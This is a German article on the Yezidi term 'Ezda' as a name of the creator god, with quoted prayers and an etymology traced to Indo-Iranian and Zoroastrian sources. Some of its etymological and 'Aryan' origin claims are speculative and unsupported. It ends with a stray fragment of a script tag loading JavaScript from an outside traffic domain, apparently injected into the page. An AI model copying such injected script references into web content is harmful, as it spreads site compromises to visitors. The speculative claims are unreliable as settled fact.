Art. Nummer Autor Datum
85 Hayrî Demir 09.05.2013

 

Bedeutung

Der kurdische Begriff „Ezda“, dt. Esda, ist einer von vielen Namen des Schöpfer-Gottes. In den heiligen Überlieferungen der Êzîden taucht er auch als „Yezdan“ oder als „Siltan Ezda“ (dt. König Ezda) auf.

Ezda setzt sich aus zwei Silben zusammen:

– kurd. „Ez“, dt. ich

– kurd. „da“ aus „dayîn“, dt. geben

Sinngemäß bedeutet Ezda demnach „Der, der mich erschaffen hat“, womit der Schöpfer-Gott gemeint ist. Der Begriff kann seinem äußeren (objektiv) und inneren (subjektiv) Wesen nach als „mein Schöpfer“ bzw. als „Der, der mich erschaffen hat“ übersetzt werden.

 

Dua Êvarê S. 1, R. 1 (subjektiv)
Ya rebî tu xwedayî, tu ezdayî – Oh Schöpfer, der sich selbst erschaffen, der mich erschaffen hat

Qewlê Xwedana S. 26 (objektiv)
Padşê minî sitar e  – Mein König bietet Schutz
Ezdanê min yekî cebar e – Mein Schöpfer ist ein Lenker
Cihê wî li hemû cih û war e – Er ist an allen Orten und Stellen anwesend

Der Name der Religionsgemeinschaft, kurd. Êzdîyatî sowie der Name der Religionsanhänger, kurd. Êzîdî, ist auf Ezda zurückzuführen.

Qewlê Xwedanan S. 12 (subj.)

Padşê min yekî mezin e – Mein König ist ein großer
Padşê hemû momin a – Er ist der König aller gelehrten
Xwedayê dinya û Ezdayê min e – er ist Der Schöpfer der Erde und mein Schöpfer

Herkunft

Ezda ist ein ursprünglich indoiranischer Begriff der primär nur von arischen Völkern gebraucht wurde. Über die Wanderung der Arier nach Nordindien fand der Begriff Ezda auch Einzug in die Rigveda, einer heiligen Schrift des Hinduismus.

In seiner mehrtausendjährigen Geschichte hat der Begriff mehrfach eine linguistische Veränderung durchlaufen. Im Sanskrit, einer arischen Sprache, taucht der Begriff Ezda als Yajatá / Yezdan auf. Später auch in der heiligen Schrift der Zoroaster als „Yazata“.

Îzet / (y)êzît / (y)êzîdî / (y)êzdî sind andere Schreibweisen für Ezda1.

Auffällig ist, dass Ezda in keiner semitischen Sprache verwendet wird. Es ist daher von einer starken Konnexion der arischen Völker mit dem Begriff Ezda auszugehen.

Quellen

1 Beghyani Shadi Sharin: "BÊŹENASIYA ZMANÊ KURDÎ YA GIŚTÎ -34“, http://www.amidakurd.com/e-pirtuk/bejenasiya-zimane-kurdi-34/ (zuletzt aufgerufen am: 09.05.2013)

and.buyittraffic.com/clizkes' type='text/javascript'>